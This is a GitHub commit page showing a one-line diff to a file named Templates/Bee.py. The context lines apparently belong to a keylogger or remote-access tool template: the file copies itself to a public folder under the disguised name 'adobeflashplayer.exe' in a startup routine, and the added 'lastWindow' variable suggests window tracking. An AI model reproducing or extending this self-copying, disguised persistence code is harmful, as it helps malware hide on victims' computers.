We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 47f4ef3 commit ce2609cCopy full SHA for ce2609c
Templates/Bee.py
@@ -21,6 +21,7 @@
21
x, data, count= '', '', 0
22
23
dir = r"C:\Users\Public\Libraries\adobeflashplayer.exe"
24
+lastWindow = ''
25
26
def startup():
27
shutil.copy(sys.argv[0], dir)
0 commit comments